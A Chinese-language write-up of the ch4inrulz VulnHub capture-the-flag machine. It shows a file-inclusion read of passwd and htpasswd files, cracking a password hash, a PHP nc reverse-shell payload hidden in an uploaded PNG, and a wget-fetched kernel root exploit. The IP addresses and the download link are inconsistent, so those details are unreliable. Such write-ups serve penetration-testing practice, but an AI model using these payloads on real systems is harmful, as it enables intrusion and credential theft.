环境介绍
VM名称:ch4inrulz: 1.0.1
发布日期:2018年7月31日
作者:askar
系列:ch4inrulz
说明:
Frank
拥有一个小型网站,他是一个具有正常安全背景的智能开发人员,他总是喜欢关注模式,您的目标是发现任何关键漏洞并获得对系统的访问权限,然后您需要获取root访问权限才能捕获根标志。
这台机器是为乔丹的Top hacker 2018 CTF制作的,我们试图让它模拟真实世界的攻击,以提高你的渗透测试
技能。
该机器在vmware(播放器/工作站)上进行了测试,没有任何问题,因此我们建议使用VMware
运行它,使用1
virtualbox`也可以正常工作。
难度:中级,您需要开箱即用并收集所有拼图以完成工作。
该机器已经启用了DHCP,因此您不会遇到任何网络问题。
v1 - 25/07/2018 v1.0.1 - 31/07/2018 修复DHCP问题。
下载地址:https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/
信息搜集
尝试一系列信息搜集技巧。
系统端口信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
|
$ nmap -sN 192.168.123.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-02 01:48 CST
Nmap scan report for Sec.lan (192.168.123.1)
Host is up (0.018s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
53/tcp open|filtered domain
80/tcp open|filtered http
1688/tcp open|filtered nsjtp-data
MAC Address: D4:5F:25:EB:89:20 (Shenzhen Youhua Technology)
Nmap scan report for 192.168.123.61
Host is up (0.00016s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
21/tcp open|filtered ftp
22/tcp open|filtered ssh
80/tcp open|filtered http
8011/tcp open|filtered unknown
MAC Address: 08:00:27:62:AE:D0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 5332.lan (192.168.123.157)
Host is up (0.0039s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
62078/tcp open|filtered iphone-sync
MAC Address: BC:9F:EF:DE:DE:DE (Apple)
Nmap scan report for 192.168.123.61
Host is up (0.0000080s latency).
All 1000 scanned ports on 192.168.123.61 are closed
Nmap done: 256 IP addresses (4 hosts up) scanned in 44.72 seconds
## root @ Sec in ~ [1:49:33]
$ nmap -A -p- 192.168.123.61
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-02 01:51 CST
Nmap scan report for ubuntu.lan (192.168.123.61)
Host is up (0.00042s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.123.61
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d4:f8:c1:55:92:75:93:f7:7b:65:dd:2b:94:e8:bb:47 (DSA)
| 2048 3d:24:ea:4f:a2:2a:ca:63:b7:f4:27:0f:d9:17:03:22 (RSA)
|_ 256 e2:54:a7:c7:ef:aa:8c:15:61:20:bd:aa:72:c0:17:88 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: FRANK's Website | Under development
8011/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:62:AE:D0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.19 - 2.6.36
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.42 ms ubuntu.lan (192.168.123.61)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.66 seconds
|
- 目标ip为
192.168.123.61
。
80
端口开启,老思路,直接测试网站。
网站信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
|
$ dirb http://192.168.123.61
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Nov 2 01:52:38 2018
URL_BASE: http://192.168.123.61/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.123.61/ ----
+ http://192.168.123.61/cgi-bin/ (CODE:403|SIZE:290)
==> DIRECTORY: http://192.168.123.61/css/
+ http://192.168.123.61/development (CODE:401|SIZE:481)
==> DIRECTORY: http://192.168.123.61/img/
+ http://192.168.123.61/index (CODE:200|SIZE:334)
+ http://192.168.123.61/index.html (CODE:200|SIZE:13516)
==> DIRECTORY: http://192.168.123.61/js/
+ http://192.168.123.61/LICENSE (CODE:200|SIZE:1093)
+ http://192.168.123.61/robots (CODE:200|SIZE:21)
+ http://192.168.123.61/robots.txt (CODE:200|SIZE:21)
+ http://192.168.123.61/server-status (CODE:403|SIZE:295)
==> DIRECTORY: http://192.168.123.61/vendor/
---- Entering directory: http://192.168.123.61/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.123.61/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.123.61/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.123.61/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Fri Nov 2 01:52:39 2018
DOWNLOADED: 4612 - FOUND: 8
|
测试8011
80
暂时无解,我选择8011
,发现是一个类似开发站。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
|
$ dirb http://192.168.123.61:8011 /usr/share/wordlists/dirb/big.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Nov 2
URL_BASE: http://192.168.123.61:8011/
WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
-----------------
GENERATED WORDS: 20458
---- Scanning URL: http://192.168.123.61:8011/ ----
==> DIRECTORY: http://192.168.123.61:8011/api/
+ http://192.168.123.61:8011/server-status (CODE:403|SIZE:297)
---- Entering directory: http://192.168.123.61:8011/api/ ----
-----------------
END_TIME: Fri Nov 2
DOWNLOADED: 40916 - FOUND: 1
|
打开http://192.168.123.61:8011/api/
发现网页内有以下内容。
- web_api.php
- records_api.php
- files_api.php
- database_api.php
- 试着逐个访问,最终我我确定files_api.php这个文件可以有。
文件包含漏洞
经过测试我发现/api/files_api.php
可以使用curl
post提交。
获取用户配置信息
curl
url为:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
|
curl -s -d "file=/etc/passwd" "http://192.168.123.205:8011/api/files_api.php"```
获取内容为:
```bash
./exp.sh /etc/passwd
root❌0:0:root:/root:/bin/bash
bin❌2:2:bin:/bin:/bin/sh
sys❌3:3:sys:/dev:/bin/sh
sync❌4:65534:sync:/bin:/bin/sync
games❌5:60:games:/usr/games:/bin/sh
man❌6:12:man:/var/cache/man:/bin/sh
lp❌7:7:lp:/var/spool/lpd:/bin/sh
mail❌8:8:mail:/var/mail:/bin/sh
news❌9:9:news:/var/spool/news:/bin/sh
uucp❌10:10:uucp:/var/spool/uucp:/bin/sh
proxy❌13:13:proxy:/bin:/bin/sh
www-data❌33:33:www-data:/var/www:/bin/sh
backup❌34:34:backup:/var/backups:/bin/sh
list❌38:38:Mailing List Manager:/var/list:/bin/sh
irc❌39:39:ircd:/var/run/ircd:/bin/sh
gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody❌65534:65534:nobody:/nonexistent:/bin/sh
libuuid❌100:101::/var/lib/libuuid:/bin/sh
syslog❌101:103::/home/syslog:/bin/false
frank❌1000:1000:frank,,,:/home/frank:/bin/bash
sshd❌102:65534::/var/run/sshd:/usr/sbin/nologin
ftp❌103:111:ftp daemon,,,:/srv/ftp:/bin/false
|
- 看了下用户信息,发现一个
frank
很亮眼貌似就是web用户,主目录是:/home/frank
。
获取.htaccess信息
再次使用hackbar
提交.htaccess
信息
http://192.168.123.61:8011/api/files_api.php?http:%2f%2f192.168.123.61:8011%2fapi%2ffiles_api.php
获取到内容为:
1
2
3
4
|
AuthUserFile /etc/.htpasswd
AuthName "Frank Development Area"
AuthType Basic
AuthGroupFile /dev/null
|
- 有一个.htpasswd,恩再次读取,貌似是开发站的登录信息。
获取.htpasswd信息
获取到内容为:frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
查看密钥类型:
1
2
3
4
5
6
7
8
9
10
11
|
hash-identifier
HASH: $apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
Possible Hashs:
[+] MD5(APR)
-------------------------------------------------------------------------
HASH: ^CTraceback (most recent call last):
File "/usr/bin/hash-identifier", line 556, in <module>
hash = raw_input(" HASH: ")
KeyboardInterrupt
|
john破解
使用john破解HASH,或者在线破解。
1
2
3
4
5
6
7
8
|
$ john hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
frank!!! (frank)
1g 0:00:00:00 DONE 1/3 (2018-11-02 03:50) 100.0g/s 18800p/s 18800c/s 18800C/s frank!!..fr4nk
Use the "--show" option to display all of the cracked passwords reliably
Session completed
|
上传漏洞
使用破解后的密码登录:/development/
发现以下内容。
- Here is my unfinished tools list
- the uploader tool (finished but need security review)
我们打开http://192.168.123.61/development/uploader/
成功访问。接下来就简单了
上传目录分析
抓包获取到upload.php
,目录分析定位为:/var/www/development/uploader/
再使用包含漏洞读取上传文件代码。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
|
$ curl -s -d "file=php://filter/convert.base64-encode/resource=/var/www/development/uploader/upload.php" "http://192.168.123.205:8011/api/files_api.php"
<head>
<title>franks website | simple website browser API</title>
</head>
PD9waHAKJHRhcmdldF9kaXIgPSAiRlJBTkt1cGxvYWRzLyI7CiR0YXJnZXRfZmlsZSA9ICR0YXJnZXRfZGlyIC4gYmFzZW5hbWUoJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bIm5hbWUiXSk7CiR1cGxvYWRPayA9IDE7CiRpbWFnZUZpbGVUeXBlID0gc3RydG9sb3dlcihwYXRoaW5mbygkdGFyZ2V0X2ZpbGUsUEFUSElORk9fRVhURU5TSU9OKSk7Ci8vIENoZWNrIGlmIGltYWdlIGZpbGUgaXMgYSBhY3R1YWwgaW1hZ2Ugb3IgZmFrZSBpbWFnZQppZihpc3NldCgkX1BPU1RbInN1Ym1pdCJdKSkgewogICAgJGNoZWNrID0gZ2V0aW1hZ2VzaXplKCRfRklMRVNbImZpbGVUb1VwbG9hZCJdWyJ0bXBfbmFtZSJdKTsKICAgIGlmKCRjaGVjayAhPT0gZmFsc2UpIHsKICAgICAgICBlY2hvICJGaWxlIGlzIGFuIGltYWdlIC0gIiAuICRjaGVja1sibWltZSJdIC4gIi4iOwogICAgICAgICR1cGxvYWRPayA9IDE7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIkZpbGUgaXMgbm90IGFuIGltYWdlLiI7CiAgICAgICAgJHVwbG9hZE9rID0gMDsKICAgIH0KfQovLyBDaGVjayBpZiBmaWxlIGFscmVhZHkgZXhpc3RzCmlmIChmaWxlX2V4aXN0cygkdGFyZ2V0X2ZpbGUpKSB7CiAgICBlY2hvICJTb3JyeSwgZmlsZSBhbHJlYWR5IGV4aXN0cy4iOwogICAgJHVwbG9hZE9rID0gMDsKfQovLyBDaGVjayBmaWxlIHNpemUKaWYgKCRfRklMRVNbImZpbGVUb1VwbG9hZCJdWyJzaXplIl0gPiA1MDAwMDApIHsKICAgIGVjaG8gIlNvcnJ5LCB5b3VyIGZpbGUgaXMgdG9vIGxhcmdlLiI7CiAgICAkdXBsb2FkT2sgPSAwOwp9Ci8vIEFsbG93IGNlcnRhaW4gZmlsZSBmb3JtYXRzCmlmKCRpbWFnZUZpbGVUeXBlICE9ICJqcGciICYmICRpbWFnZUZpbGVUeXBlICE9ICJwbmciICYmICRpbWFnZUZpbGVUeXBlICE9ICJqcGVnIgomJiAkaW1hZ2VGaWxlVHlwZSAhPSAiZ2lmIiApIHsKICAgIGVjaG8gIlNvcnJ5LCBvbmx5IEpQRywgSlBFRywgUE5HICYgR0lGIGZpbGVzIGFyZSBhbGxvd2VkLiI7CiAgICAkdXBsb2FkT2sgPSAwOwp9Ci8vIENoZWNrIGlmICR1cGxvYWRPayBpcyBzZXQgdG8gMCBieSBhbiBlcnJvcgppZiAoJHVwbG9hZE9rID09IDApIHsKICAgIGVjaG8gIlNvcnJ5LCB5b3VyIGZpbGUgd2FzIG5vdCB1cGxvYWRlZC4iOwovLyBpZiBldmVyeXRoaW5nIGlzIG9rLCB0cnkgdG8gdXBsb2FkIGZpbGUKfSBlbHNlIHsKICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bInRtcF9uYW1lIl0sICR0YXJnZXRfZmlsZSkpIHsKICAgICAgICBlY2hvICJUaGUgZmlsZSAiLiBiYXNlbmFtZSggJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bIm5hbWUiXSkuICIgaGFzIGJlZW4gdXBsb2FkZWQgdG8gbXkgdXBsb2FkcyBwYXRoLiI7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIlNvcnJ5LCB0aGVyZSB3YXMgYW4gZXJyb3IgdXBsb2FkaW5nIHlvdXIgZmlsZS4iOwogICAgfQp9Cj8+Cgo=```
base64解码
```bash
$ echo PD9waHAKJHRhcmdldF9kaXIgPSAiRlJBTkt1cGxvYWRzLyI7CiR0YXJnZXRfZmlsZSA9ICR0YXJnZXRfZGlyIC4gYmFzZW5hbWUoJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bIm5hbWUiXSk7CiR1cGxvYWRPayA9IDE7CiRpbWFnZUZpbGVUeXBlID0gc3RydG9sb3dlcihwYXRoaW5mbygkdGFyZ2V0X2ZpbGUsUEFUSElORk9fRVhURU5TSU9OKSk7Ci8vIENoZWNrIGlmIGltYWdlIGZpbGUgaXMgYSBhY3R1YWwgaW1hZ2Ugb3IgZmFrZSBpbWFnZQppZihpc3NldCgkX1BPU1RbInN1Ym1pdCJdKSkgewogICAgJGNoZWNrID0gZ2V0aW1hZ2VzaXplKCRfRklMRVNbImZpbGVUb1VwbG9hZCJdWyJ0bXBfbmFtZSJdKTsKICAgIGlmKCRjaGVjayAhPT0gZmFsc2UpIHsKICAgICAgICBlY2hvICJGaWxlIGlzIGFuIGltYWdlIC0gIiAuICRjaGVja1sibWltZSJdIC4gIi4iOwogICAgICAgICR1cGxvYWRPayA9IDE7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIkZpbGUgaXMgbm90IGFuIGltYWdlLiI7CiAgICAgICAgJHVwbG9hZE9rID0gMDsKICAgIH0KfQovLyBDaGVjayBpZiBmaWxlIGFscmVhZHkgZXhpc3RzCmlmIChmaWxlX2V4aXN0cygkdGFyZ2V0X2ZpbGUpKSB7CiAgICBlY2hvICJTb3JyeSwgZmlsZSBhbHJlYWR5IGV4aXN0cy4iOwogICAgJHVwbG9hZE9rID0gMDsKfQovLyBDaGVjayBmaWxlIHNpemUKaWYgKCRfRklMRVNbImZpbGVUb1VwbG9hZCJdWyJzaXplIl0gPiA1MDAwMDApIHsKICAgIGVjaG8gIlNvcnJ5LCB5b3VyIGZpbGUgaXMgdG9vIGxhcmdlLiI7CiAgICAkdXBsb2FkT2sgPSAwOwp9Ci8vIEFsbG93IGNlcnRhaW4gZmlsZSBmb3JtYXRzCmlmKCRpbWFnZUZpbGVUeXBlICE9ICJqcGciICYmICRpbWFnZUZpbGVUeXBlICE9ICJwbmciICYmICRpbWFnZUZpbGVUeXBlICE9ICJqcGVnIgomJiAkaW1hZ2VGaWxlVHlwZSAhPSAiZ2lmIiApIHsKICAgIGVjaG8gIlNvcnJ5LCBvbmx5IEpQRywgSlBFRywgUE5HICYgR0lGIGZpbGVzIGFyZSBhbGxvd2VkLiI7CiAgICAkdXBsb2FkT2sgPSAwOwp9Ci8vIENoZWNrIGlmICR1cGxvYWRPayBpcyBzZXQgdG8gMCBieSBhbiBlcnJvcgppZiAoJHVwbG9hZE9rID09IDApIHsKICAgIGVjaG8gIlNvcnJ5LCB5b3VyIGZpbGUgd2FzIG5vdCB1cGxvYWRlZC4iOwovLyBpZiBldmVyeXRoaW5nIGlzIG9rLCB0cnkgdG8gdXBsb2FkIGZpbGUKfSBlbHNlIHsKICAgIGlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bInRtcF9uYW1lIl0sICR0YXJnZXRfZmlsZSkpIHsKICAgICAgICBlY2hvICJUaGUgZmlsZSAiLiBiYXNlbmFtZSggJF9GSUxFU1siZmlsZVRvVXBsb2FkIl1bIm5hbWUiXSkuICIgaGFzIGJlZW4gdXBsb2FkZWQgdG8gbXkgdXBsb2FkcyBwYXRoLiI7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIlNvcnJ5LCB0aGVyZSB3YXMgYW4gZXJyb3IgdXBsb2FkaW5nIHlvdXIgZmlsZS4iOwogICAgfQp9Cj8+Cgo= | base64 --decode
<?php
$target_dir = "FRANKuploads/";
$target_file = $target_dir . basename($_FILES["fileToUpload"]["name"]);
$uploadOk = 1;
$imageFileType = strtolower(pathinfo($target_file,PATHINFO_EXTENSION));
// Check if image file is a actual image or fake image
if(isset($_POST["submit"])) {
$check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
if($check !== false) {
echo "File is an image - " . $check["mime"] . ".";
$uploadOk = 1;
} else {
echo "File is not an image.";
$uploadOk = 0;
}
}
// Check if file already exists
if (file_exists($target_file)) {
echo "Sorry, file already exists.";
$uploadOk = 0;
}
// Check file size
if ($_FILES["fileToUpload"]["size"] > 500000) {
echo "Sorry, your file is too large.";
$uploadOk = 0;
}
// Allow certain file formats
if($imageFileType != "jpg" && $imageFileType != "png" && $imageFileType != "jpeg"
&& $imageFileType != "gif" ) {
echo "Sorry, only JPG, JPEG, PNG & GIF files are allowed.";
$uploadOk = 0;
}
// Check if $uploadOk is set to 0 by an error
if ($uploadOk == 0) {
echo "Sorry, your file was not uploaded.";
// if everything is ok, try to upload file
} else {
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
echo "The file ". basename( $_FILES["fileToUpload"]["name"]). " has been uploaded to my uploads path.";
} else {
echo "Sorry, there was an error uploading your file.";
}
}
?>
|
利用
生成并上传shell
我们使用直接上传shell,可以用菜刀之类的,这里使用一个nc反弹脚本。
1
|
echo "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.123.61 8143 >/tmp/f') ?>" >> pass.png
|
- 在测试过程中我发现这个上传漏洞会过滤掉php信息,所以我们在头部加上一个图片的标识来绕过限制,pass.png为正常图片。
获得shell
开启nc监听
直接curl反弹
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
|
curl -X POST http://192.168.123.205:8011/api/files_api.php --data "file=/var/www/development/uploader/FRANKuploads/pass.png"```
nc反弹成功
```bash
connect to [192.168.123.61] from (UNKNOWN) [192.168.123.205] 49514
/bin/sh: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@ubuntu:/var/anotherwww/api$ ls
ls
files_api.php index.html
www-data@ubuntu:/var/anotherwww/api$ cd /tmp
cd /tmp
www-data@ubuntu:/tmp$ ls
ls
f rev
www-data@ubuntu:/tmp$ uname -a
uname -a
Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
|
- shell获取成功,但是只是一个低权限的账户,我们需要提权。
提权
搜索漏洞
用searchsploit搜索系统漏洞。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
|
$ searchsploit Kernel 2.6.3
--------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < | exploits/linux/local/9844.py
Linux Kernel 2.4.4 < 2.4.37.4 / 2.6.0 | exploits/linux/local/19933.rb
Linux Kernel 2.6.0 < 2.6.31 - 'pipe.c' | exploits/linux/local/33321.c
Linux Kernel 2.6.10 < 2.6.31.5 - 'pipe | exploits/linux/local/40812.c
Linux Kernel 2.6.27 < 2.6.36 (RedHat x | exploits/linux_x86-64/local/15024.c
Linux Kernel 2.6.3 - 'setsockopt' Loca | exploits/linux/dos/274.c
Linux Kernel 2.6.30 - 'atalk_getname() | exploits/linux/local/9521.c
Linux Kernel 2.6.30 - 'tun_chr_pool()' | exploits/linux/dos/33088.txt
Linux Kernel 2.6.30 < 2.6.30.1 / SELin | exploits/linux/local/9191.txt
Linux Kernel 2.6.31 - 'perf_counter_op | exploits/linux/dos/33228.txt
Linux Kernel 2.6.31-rc5 - sigaltstack | exploits/linux/local/9352.c
Linux Kernel 2.6.31-rc7 - 'AF_LLC gets | exploits/linux/local/9513.c
Linux Kernel 2.6.31.4 - 'unix_stream_c | exploits/linux/dos/10022.c
Linux Kernel 2.6.32 (Ubuntu 10.04) - ' | exploits/linux/local/41770.txt
Linux Kernel 2.6.32 - 'pipe.c' Local P | exploits/linux/local/10018.sh
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) | exploits/linux/local/25444.c
Linux Kernel 2.6.32-5 (Debian 6.0.5) - | exploits/linux/local/24459.sh
Linux Kernel 2.6.32-642/3.16.0-4 - 'in | exploits/linux/dos/40819.c
Linux Kernel 2.6.32-rc1 (x86-64) - Reg | exploits/linux_x86-64/local/40811.c
Linux Kernel 2.6.33.3 - SCTP INIT Remo | exploits/linux/dos/14594.py
Linux Kernel 2.6.34 - 'find_keyring_by | exploits/linux/dos/33886.txt
Linux Kernel 2.6.35 - Network Namespac | exploits/linux/dos/36425.txt
Linux Kernel 2.6.36 - VIDIOCSMICROCODE | exploits/linux/local/15344.c
Linux Kernel 2.6.36 IGMP - Remote Deni | exploits/linux/dos/18378.c
Linux Kernel 2.6.36-rc8 - 'RDS Protoco | exploits/linux/local/15285.c
Linux Kernel 2.6.37 (RedHat / Ubuntu 1 | exploits/linux/local/15704.c
Linux Kernel 2.6.37 - 'setup_arg_pages | exploits/linux/dos/15619.c
Linux Kernel 2.6.37 - Local Kernel Den | exploits/linux/dos/16263.c
Linux Kernel 2.6.37 - Unix Sockets Loc | exploits/linux/dos/15622.c
Linux Kernel 2.6.37-rc1 - 'serial_mult | exploits/linux/local/18080.c
Linux Kernel 2.6.39 < 3.2.2 (Gentoo / | exploits/linux/local/18411.c
Linux Kernel 2.6.39 < 3.2.2 (x86/x64) | exploits/linux/local/35161.c
Linux Kernel < 2.6.30.5 - 'cfg80211' R | exploits/linux/dos/9442.c
Linux Kernel < 2.6.31-rc4 - 'nfs4_proc | exploits/linux/dos/10202.c
Linux Kernel < 2.6.31-rc7 - 'AF_IRDA' | exploits/linux/local/9543.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x8 | exploits/linux/local/15944.c
Linux Kernel < 2.6.34 (Ubuntu 10.10 x8 | exploits/linux_x86/local/15916.c
Linux Kernel < 2.6.36-rc1 (Ubuntu 10.0 | exploits/linux/local/14814.c
Linux Kernel < 2.6.36-rc4-git2 (x86-64 | exploits/linux_x86-64/local/15023.c
Linux Kernel < 2.6.36-rc6 (RedHat / Ub | exploits/linux/local/15150.c
Linux Kernel < 2.6.36.2 (Ubuntu 10.04) | exploits/linux/local/17787.c
Linux Kernel < 2.6.37-rc2 - 'ACPI cust | exploits/linux/local/15774.c
Linux Kernel < 2.6.37-rc2 - 'TCP_MAXSE | exploits/linux/dos/16952.c
Linux/MIPS Kernel 2.6.36 - 'NetUSB' Re | exploits/multiple/remote/38454.py
ReiserFS (Linux Kernel 2.6.34-rc3 / Re | exploits/linux/local/12130.py
--------------------------------------- ----------------------------------------
Shellcodes: No Result
|
- 搜索到很多,使用这个
exploits/linux/local/15285.c
。
上传exp并提权
切换到漏洞目录,开启简易web服务。
1
2
3
4
|
$ cd /usr/share/exploitdb/exploits/linux/local
## root @ Sec in /usr/share/exploitdb/exploits/linux/local
$ python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
|
在反弹成功的窗口直接下载poc并编译运行。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
|
www-data@ubuntu:/tmp$ wget http://192.168.123.61/15285.c
wget http://192.168.123.61/15285.c
--2018-11-02 03:59:21-- http://192.168.123.61/15285.c
Connecting to 192.168.123.61:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7155 (7.0K) [text/plain]
Saving to: `15285.c'
100%[======================================>] 7,155 --.-K/s in 0.003s
2018-11-02 03:59:21 (2.57 MB/s) - `15285.c' saved [7155/7155]
www-data@ubuntu:/tmp$ ls
ls
15285.c f rev
www-data@ubuntu:/tmp$ gcc 15285.c
gcc 15285.c
www-data@ubuntu:/tmp$ ls
ls
15285.c a.out f rev
www-data@ubuntu:/tmp$ gcc 15285.c -o exp
gcc 15285.c -o exp
www-data@ubuntu:/tmp$ ls
ls
15285.c a.out exp f rev
www-data@ubuntu:/tmp$ ./exp
./exp
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved security_ops to 0xffffffff81ce8df0
[+] Resolved default_security_ops to 0xffffffff81a523e0
[+] Resolved cap_ptrace_traceme to 0xffffffff8125db60
[+] Resolved commit_creds to 0xffffffff810852b0
[+] Resolved prepare_kernel_cred to 0xffffffff81085780
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
## ls
ls
15285.c a.out exp f rev
## cd /root
cd /root
## ls
ls
root.txt
## cat root.txt
cat root.txt
8f420533b79076cc99e9f95a1a4e5568
|
心得
这个环境真心强大,主要考核免杀,二次反弹,文件上传,内核提权等。